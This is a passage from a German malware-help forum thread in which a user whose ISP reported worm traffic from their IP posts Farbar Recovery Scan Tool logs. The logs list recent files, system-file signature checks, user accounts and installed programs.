2017-08-07 19:35 - 2017-05-17 19:05 - 000000000 ____D C:\Users\***\AppData\Local\b95cd
2017-08-07 19:15 - 2017-05-02 14:50 - 000000988 _____ C:\Users\Public\Desktop\TomTom MyDrive Connect.lnk
2017-08-07 03:30 - 2016-01-03 14:51 - 000000000 ____D C:\Users\***\AppData\Local\CrashDumps
2017-08-06 16:31 - 2017-04-18 18:59 - 000001457 _____ C:\Users\***\Desktop\KCD.lnk
2017-08-06 13:21 - 2015-02-06 20:34 - 000000000 ____D C:\Users\***\Documents\The Lord of the Rings Online
2017-08-06 12:40 - 2015-02-06 20:39 - 000000000 ____D C:\Users\***\AppData\Local\Turbine
2017-08-06 01:00 - 2015-04-04 15:53 - 000000000 ____D C:\Program Files\GIMP 2
2017-08-06 00:35 - 2015-03-15 23:53 - 000000000 ____D C:\Program Files (x86)\Java
2017-08-06 00:28 - 2015-02-06 19:17 - 000000000 ____D C:\ProgramData\Oracle
2017-08-06 00:28 - 2015-02-06 19:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2017-08-06 00:26 - 2017-05-02 17:37 - 000002170 _____ C:\Users\Public\Desktop\Smart Switch.lnk
2017-08-06 00:25 - 2017-04-06 21:53 - 000000000 ____D C:\Users\***\AppData\Roaming\MyPhoneExplorer
2017-08-06 00:20 - 2015-03-15 23:24 - 000000000 ____D C:\Program Files (x86)\IObit
2017-08-06 00:12 - 2015-02-06 19:58 - 000000000 ____D C:\Users\***\AppData\Local\Battle.net
2017-08-05 23:25 - 2015-02-06 20:19 - 000000000 ____D C:\ProgramData\Package Cache
2017-08-05 23:20 - 2015-05-19 11:35 - 000000000 ____D C:\GOG Games
2017-08-05 23:04 - 2017-03-18 13:40 - 000032768 _____ C:\WINDOWS\system32\config\ELAM
2017-08-05 23:04 - 2015-02-06 19:51 - 000565416 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2017-08-05 23:00 - 2016-06-12 12:19 - 000000000 ____D C:\Program Files (x86)\Adobe
2017-08-03 20:00 - 2017-05-09 19:18 - 000000626 _____ C:\Users\Martin
2017-08-01 14:04 - 2015-06-16 18:56 - 000000000 ____D C:\Users\***\AppData\Local\Dropbox
2017-08-01 14:04 - 2015-02-07 15:28 - 000000000 ___RD C:\Users\***\Dropbox
2017-08-01 03:15 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\rescache
2017-08-01 02:04 - 2015-12-12 16:08 - 000000000 ____D C:\Users\***\AppData\Roaming\Mozilla
2017-08-01 01:54 - 2015-02-06 18:54 - 000000000 ____D C:\Users\***\AppData\Local\Google
2017-08-01 01:54 - 2015-02-06 18:54 - 000000000 ____D C:\Program Files (x86)\Google
2017-07-31 20:56 - 2015-02-06 19:26 - 000000000 ____D C:\Users\***\AppData\Roaming\Origin
2017-07-31 20:56 - 2015-02-06 19:25 - 000000000 ____D C:\ProgramData\Origin
2017-07-31 20:21 - 2016-11-04 22:04 - 000000000 ____D C:\Users\***\Documents\Darkest
2017-07-31 20:21 - 2015-05-19 13:16 - 000000000 ____D C:\Users\***\Documents\The Witcher 3
2017-07-31 20:17 - 2015-05-19 12:54 - 000000000 ____D C:\Program Files (x86)\GalaxyClient
2017-07-31 20:02 - 2016-05-04 20:53 - 000000000 ____D C:\ProgramData\Logitech
2017-07-31 20:02 - 2016-05-04 17:52 - 000000000 ____D C:\ProgramData\Squeezebox
2017-07-31 20:02 - 2016-05-02 22:30 - 000000000 ____D C:\Program Files (x86)\Logitech
2017-07-28 19:41 - 2017-04-19 20:10 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2017-07-28 19:41 - 2016-03-11 21:30 - 000000000 ____D C:\Program Files (x86)\VulkanRT
2017-07-28 19:41 - 2015-02-03 17:22 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2017-07-28 18:14 - 2017-04-19 20:10 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2017-07-28 18:14 - 2017-04-19 20:10 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2017-07-28 18:14 - 2016-09-29 12:59 - 000001481 _____ C:\Users\Public\Desktop\GeForce Experience.lnk
2017-07-28 18:06 - 2015-04-28 22:14 - 000000865 _____ C:\Users\Public\Desktop\CCleaner.lnk
2017-07-26 23:16 - 2017-03-06 22:52 - 000000000 ____D C:\Users\***\AppData\Roaming\discord
2017-07-26 23:16 - 2017-03-06 22:52 - 000000000 ____D C:\Users\***\AppData\Local\Discord
2017-07-26 19:09 - 2016-09-29 12:59 - 001755072 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspbridge64.dll
2017-07-26 19:09 - 2016-09-29 12:59 - 001317312 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspbridge.dll
2017-07-26 19:09 - 2016-09-29 12:59 - 000121280 _____ C:\WINDOWS\system32\NvRtmpStreamer64.dll
2017-07-26 15:40 - 2017-04-06 19:59 - 000001951 _____ C:\WINDOWS\NvTelemetryContainerRecovery.bat
2017-07-19 01:24 - 2017-05-06 18:18 - 000069752 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvshext.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 006463608 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcpl.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 002479040 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvc64.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 001762936 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvcr.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 000549312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshext.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 000392312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmctray.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 000081856 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshextr.dll
2017-07-19 00:54 - 2017-04-19 20:10 - 000001951 _____ C:\WINDOWS\NvContainerRecovery.bat
2017-07-18 13:23 - 2015-03-01 21:28 - 000000000 ____D C:\ProgramData\Skype
2017-07-15 22:51 - 2017-03-31 19:55 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Darkest Dungeon [GOG.com]
2017-07-13 03:37 - 2017-04-19 20:10 - 008095171 _____ C:\WINDOWS\system32\nvcoproc.bin
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ___SD C:\WINDOWS\system32\F12
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ___RD C:\Program Files\Windows Defender
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\migwiz
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\appraiser
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\Program Files (x86)\Windows Defender

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2017-02-10 19:24 - 2017-02-10 19:24 - 000000824 _____ () C:\Users\***\AppData\Local\recently-used.xbel
2017-08-08 17:48 - 2017-08-08 17:48 - 000000017 _____ () C:\Users\***\AppData\Local\resmon.resmoncfg
2016-11-05 23:04 - 2016-11-05 23:04 - 000000141 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc

==================== Bamital & volsnap ======================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\wininit.exe FEHLT <==== ACHTUNG
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert

LastRegBack: 2017-08-07 19:33

==================== Ende von FRST.txt ============================
         

Alt 09.08.2017, 18:07   #28
Lost_Viking
 
UPC meldet: Virus, würmer werden über meine IP versendet - Standard

Addition



Code:
ATTFilter
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 09-08-2017
durchgeführt von ***** (09-08-2017 19:01:53)
Gestartet von C:\Users\*****\Desktop
Windows 7 Ultimate (X64) (2017-04-19 18:18:33)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-1566530412-1856523912-1524002813-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1566530412-1856523912-1524002813-503 - Limited - Disabled)
Gast (S-1-5-21-1566530412-1856523912-1524002813-501 - Limited - Disabled)
***** (S-1-5-21-1566530412-1856523912-1524002813-1001 - Administrator - Enabled) => C:\Users\*****

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Akamai NetSession Interface (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Akamai) (Version:  - Akamai Technologies, Inc)
Ansel (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Ansel) (Version: 384.94 - NVIDIA Corporation) Hidden
ARK: Survival Evolved (HKLM\...\Steam App 346110) (Version:  - Studio Wildcard)
Asmedia ASM104x USB 3.0 Host Controller Driver (HKLM-x32\...\{E4FB0B39-C991-4EE7-95DD-1A1A7857D33D}) (Version: 1.16.12.0 - Asmedia Technology)
AVerMedia C353 HD Capture Device 3.3.64.53 (HKLM-x32\...\AVerMedia C353 HD Capture Device) (Version: 3.3.64.53 - AVerMedia TECHNOLOGIES, Inc.)
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Borderlands 2 (HKLM-x32\...\Steam App 49520) (Version:  - Gearbox Software)
CameraHelperMsi (HKLM-x32\...\{15634701-BACE-4449-8B25-1567DA8C9FD3}) (Version: 13.51.815.0 - Logitech) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 5.32 - Piriform)
Darkest Dungeon (HKLM-x32\...\1450711444_is1) (Version: 20340 - GOG.com)
Discord (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Discord) (Version: 0.0.297 - Hammer & Chisel, Inc.)
Dragon Age™: Inquisition (HKLM-x32\...\{DC4C36DC-4E5B-4262-B0C7-157DF534B969}) (Version: 1.0.0.12 - Electronic Arts)
Dropbox (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Dropbox) (Version: 32.4.21 - Dropbox, Inc.)
Dual-Core Optimizer (HKLM-x32\...\{9FD6F1A8-5550-46AF-8509-271DF0E768B5}) (Version: 1.1.4.0169 - AMD)
Elite Dangerous: Horizons (HKLM-x32\...\Steam App 419270) (Version:  - Frontier Developments)
Elite: Dangerous (HKLM-x32\...\Steam App 359320) (Version:  - Frontier Developments)
Endless Space (HKLM-x32\...\Steam App 208140) (Version:  - AMPLITUDE Studios)
erLT (HKLM-x32\...\{3EE9BCAE-E9A9-45E5-9B1C-83A4D357E05C}) (Version: 1.20.138.34 - Logitech, Inc.) Hidden
EVE Online (HKLM\...\Steam App 8500) (Version:  - CCP)
Fallout 4 (HKLM-x32\...\Steam App 377160) (Version:  - Bethesda Game Studios)
ForHonor (HKLM-x32\...\Uplay Install 569) (Version:  - Ubisoft)
Galactic Civilizations III (HKLM\...\Steam App 226860) (Version:  - Stardock Entertainment)
GameLauncherRemoval (KCD Beta Access) (HKLM-x32\...\{64189CD8-0B86-4F81-9C05-584E60386D66}) (Version: 1.0.0.0 - Warhorse Studios) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 60.0.3112.90 - Google Inc.)
Google Photos Backup (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Google Photos Backup) (Version: 1.1.2.13 - Google, Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.5 - Google Inc.) Hidden
Guild Wars 2 (HKLM-x32\...\Guild Wars 2) (Version:  - NCsoft Corporation, Ltd.)
Hearthstone (HKLM-x32\...\Hearthstone) (Version:  - Blizzard Entertainment)
Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version:  - Blizzard Entertainment)
HiPatch (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF000}) (Version: 5.0.3.9 - Hi-Rez Studios)
Hi-Rez Studios Authenticate and Update Service (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF1FC}) (Version: 3.0.0.0 - Hi-Rez Studios)
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 10.0.28.1006 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 13.1.0.1058 - Intel Corporation)
Intel(R) Update Manager (HKLM-x32\...\{B991A1BC-DE0F-41B3-9037-B2F948F706EC}) (Version: 3.1.1228 - Intel Corporation)
Java 8 Update 144 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180144F0}) (Version: 8.0.1440.1 - Oracle Corporation)
KCD Beta Access (HKLM-x32\...\{d2fb0ffd-876a-49ad-a428-fbb255d5d8d2}) (Version: 4.0 - Warhorse Studios)
KCD Beta Access (HKLM-x32\...\{FD95EDF6-7B9F-4BD1-8DAD-63D8BDD45B96}) (Version: 4.0 - Warhorse Studios) Hidden
League of Legends (HKLM-x32\...\{517CC397-B22F-4593-8DCB-DE72CC541E9A}) (Version: 3.0.1 - Riot Games ) Hidden
League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games )
LEGO® Der Herr der Ringe™ (HKLM-x32\...\{C6F20FA7-342A-47A9-A3C8-EB36CABE6419}) (Version: 1.0.0.0 - Warner Bros. Interactive Entertainment)
Logitech Gaming Software 8.92 (HKLM\...\Logitech Gaming Software) (Version: 8.92.67 - Logitech Inc.)
Logitech SetPoint 6.67 (HKLM\...\sp6) (Version: 6.67.83 - Logitech)
Logitech Webcam-Software (HKLM-x32\...\{D40EB009-0499-459c-A8AF-C9C110766215}) (Version: 2.80 - Logitech Inc.)
Manager (HKLM-x32\...\{2D00EBC4-DD22-4F5B-9BA1-F98ED2C6FCF2}) (Version: 5.0.15.31893 - 2017 pdfforge GmbH. All rights reserved) Hidden
Master of Orion (HKLM\...\Steam App 298050) (Version:  - NGD Studios)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{F2508213-9989-4E85-A078-72BE483917EF}) (Version: 3.5.88.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{4CB0307C-565E-4441-86BE-0DF2E4FB828C}) (Version: 3.5.50.0 - Microsoft Corporation)
Microsoft LifeCam (HKLM\...\{5CE7E3F5-9803-4F32-AA89-2D8848A80109}) (Version: 3.60.253.0 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\OneDriveSetup.exe) (Version: 17.3.6816.0313 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{3c3aafc8-d898-43ec-998f-965ffdae065a}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
Minion (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\{Minion}}_is1) (Version: 3.0 - Good Game Mods LLC)
Mordheim: City of the Damned (HKLM-x32\...\Steam App 276810) (Version:  - Rogue Factor)
MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
MyPhoneExplorer (HKLM-x32\...\MPE) (Version: 1.8.8 - F.J. Wechselberger)
No Man's Sky (HKLM\...\Steam App 275850) (Version:  - Hello Games)
NVIDIA 3D Vision Controller-Treiber 369.04 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 369.04 - NVIDIA Corporation)
NVIDIA 3D Vision Treiber 384.94 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 384.94 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.8.0.89 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.8.0.89 - NVIDIA Corporation)
NVIDIA Grafiktreiber 384.94 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 384.94 - NVIDIA Corporation)
NVIDIA HD-Audiotreiber 1.3.34.27 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.27 - NVIDIA Corporation)
NVIDIA Miracast Virtueller Ton 355.82 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Miracast.VirtualAudio) (Version: 355.82 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.17.0524 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0524 - NVIDIA Corporation)
NvvHci (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvvHci) (Version: 2.02.0.5 - NVIDIA Corporation) Hidden
OLYMPUS Digital Camera Updater (HKLM-x32\...\{962428F4-2E99-4AD2-B55D-B468C18A8A89}) (Version: 2.0.0 - Olympus Corporation)
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
OpenOffice 4.1.3 (HKLM-x32\...\{8D5FCC56-BB9F-4122-923C-71753F50F6F5}) (Version: 4.13.9783 - Apache Software Foundation)
Origin (HKLM-x32\...\Origin) (Version: 10.4.16.25850 - Electronic Arts, Inc.)
Platform (HKLM-x32\...\{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.42 - VIA Technologies, Inc.) Hidden
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.991 - Even Balance, Inc.)
Qualcomm Atheros 11AC Drivers (HKLM\...\{45724D31-7270-4A0B-B236-5119CFDA42DB}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden
Qualcomm Atheros 61x4 Bluetooth Suite (64) (HKLM\...\{628988B4-3FA5-4EA6-BAA3-DA640F6718BD}) (Version: 3.0.0.357 - Qualcomm Atheros)
Qualcomm Atheros Bandwidth Control Filter Driver (HKLM\...\{42F56083-A726-4599-A231-EF6200A39AF6}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden
Qualcomm Atheros Killer E220x Drivers (HKLM\...\{1CC47E9F-A34A-44B3-8C5A-D45C1A3CB94C}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden
Qualcomm Atheros Killer Performance Suite (HKLM-x32\...\{E70DB50B-10B4-46BC-9DE2-AB8B49E061EE}) (Version: 1.1.47.1058 - Qualcomm Atheros)
Qualcomm Atheros Network Manager (HKLM\...\{A32F7F52-0DC5-40EF-84BD-7D30CC20D157}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden
Rayman Origins (HKLM-x32\...\Uplay Install 80) (Version:  - Ubisoft)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8036 - Realtek Semiconductor Corp.)
Revo Uninstaller 2.0.3 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.0.3 - VS Revo Group, Ltd.)
Rise of the Tomb Raider (HKLM\...\Steam App 391220) (Version:  - Crystal Dynamics)
Samsung Kies (HKLM-x32\...\{758C8301-2696-4855-AF45-534B1200980A}) (Version: 2.6.4.16113.3 - Samsung Electronics Co., Ltd.) Hidden
Samsung Kies (HKLM-x32\...\InstallShield_{758C8301-2696-4855-AF45-534B1200980A}) (Version: 2.6.4.16113.3 - Samsung Electronics Co., Ltd.)
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.61.0 - Samsung Electronics Co., Ltd.)
SimCity™ (HKLM-x32\...\{F70FDE4B-8F86-4eb6-8C8E-636EC89F6419}) (Version: 4.0.98.0213 - Electronic Arts)
Skype Click to Call (HKLM-x32\...\{873F8E7C-10E6-449F-BD7E-5FBA7C8E1C9B}) (Version: 8.5.0.9167 - Microsoft Corporation)
Skype Web Plugin (HKLM-x32\...\{E8A70371-2C4D-4B12-831D-6A4BB9AC7AEF}) (Version: 7.29.0.73 - Skype Technologies S.A.)
Skype™ 7.38 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.38.101 - Skype Technologies S.A.)
Smart Switch (HKLM-x32\...\{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.17054.16 - Samsung Electronics Co., Ltd.) Hidden
Smart Switch (HKLM-x32\...\InstallShield_{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.17054.16 - Samsung Electronics Co., Ltd.)
Smart Technology Programming Software 7.0.27.13 (HKLM\...\{C9193CBB-C31A-412A-A074-AD08F0F2CF3D}) (Version: 7.0.27.13 - Mad Catz)
Smite (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF017}) (Version: 4.14.4229.4 - Hi-Rez Studios)
Spotify (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Spotify) (Version: 1.0.53.758.gde3fc4b2 - Spotify AB)
Star Citizen Launcher (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Star Citizen Launcher) (Version: 00.01.00.00 - Cloud Imperium Games)
STAR WARS™ Battlefront™ (HKLM-x32\...\{E402D891-4E45-4ce9-B41F-DD35864EF170}) (Version: 1.0.7.64833 - Electronic Arts)
StarCraft II (HKLM-x32\...\StarCraft II) (Version:  - Blizzard Entertainment)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Steuer St.Gallen 2016 nP 1.6.0 (HKLM-x32\...\0222-4883-7289-1667) (Version: 1.6.0 - Information Factory AG)
TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH)
Terraria (HKLM-x32\...\Steam App 105600) (Version:  - Re-Logic)
The Elder Scrolls Online (HKLM-x32\...\The Elder Scrolls Online) (Version: 1.0.0.0 - Zenimax Online Studios)
The Long Dark (HKLM\...\Steam App 305620) (Version:  - Hinterland Studio Inc.)
The Witcher 3 - Wild Hunt (HKLM-x32\...\1207664643_is1) (Version: 1.31.0.0 - GOG.com)
The Witcher 3: Wild Hunt - Blood and Wine (HKLM-x32\...\Blood and Wine_is1) (Version: 1.24.0.0 - GOG.com)
The Witcher 3: Wild Hunt - Free DLC program (16 DLC) (HKLM-x32\...\Free DLC program (16 DLC)_is1) (Version: 1.24.0.0 - GOG.com)
The Witcher 3: Wild Hunt - Hearts of Stone (HKLM-x32\...\Hearts of Stone_is1) (Version: 1.24.0.0 - GOG.com)
Tom Clancy's The Division (HKLM\...\Steam App 365590) (Version:  - Massive Entertainment)
TomTom MyDrive Connect 4.1.6.3229 (HKLM-x32\...\MyDriveConnect) (Version: 4.1.6.3229 - TomTom)
Total War™: WARHAMMER® (HKLM\...\Steam App 364360) (Version:  - Creative Assembly)
Tyranny (HKLM\...\Steam App 362960) (Version:  - Obsidian Entertainment)
Uplay (HKLM-x32\...\Uplay) (Version: 5.1 - Ubisoft)
VIA Plattform-Geräte-Manager (HKLM-x32\...\InstallShield_{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.42 - VIA Technologies, Inc.)
Visual Studio C++ 10.0 Runtime (HKLM-x32\...\{4412F224-3849-4461-A3E9-DEEF8D252790}) (Version: 10.0.0 - TomTom International B.V.)
VoiceAttack (HKLM-x32\...\{75E13F4F-139E-4CCA-A5A5-7476E4C5484D}) (Version: 1.4 - VoiceAttack.com)
Vulkan Run Time Libraries 1.0.3.0 (HKLM\...\VulkanRT1.0.3.0) (Version: 1.0.3.0 - LunarG, Inc.)
Vulkan Run Time Libraries 1.0.42.1 (HKLM\...\VulkanRT1.0.42.1) (Version: 1.0.42.1 - LunarG, Inc.)
Warframe (HKLM-x32\...\{EE130AB8-143A-4AA2-B81A-79EC1623C899}) (Version: 1.0.0 - Digital Extremes)
Warhammer 40,000: Dawn of War III (HKLM\...\Steam App 285190) (Version:  - Relic Entertainment)
Warhammer: End Times - Vermintide (HKLM\...\Steam App 235540) (Version:  - Fatshark)
WestwoodOnline (HKLM-x32\...\{BBCD6D56-8A26-4DDE-9482-DBC9C7B7341D}) (Version:  - )
Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation)
Wolfenstein: The New Order German Edition (HKLM-x32\...\Steam App 288570) (Version:  - MachineGames)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

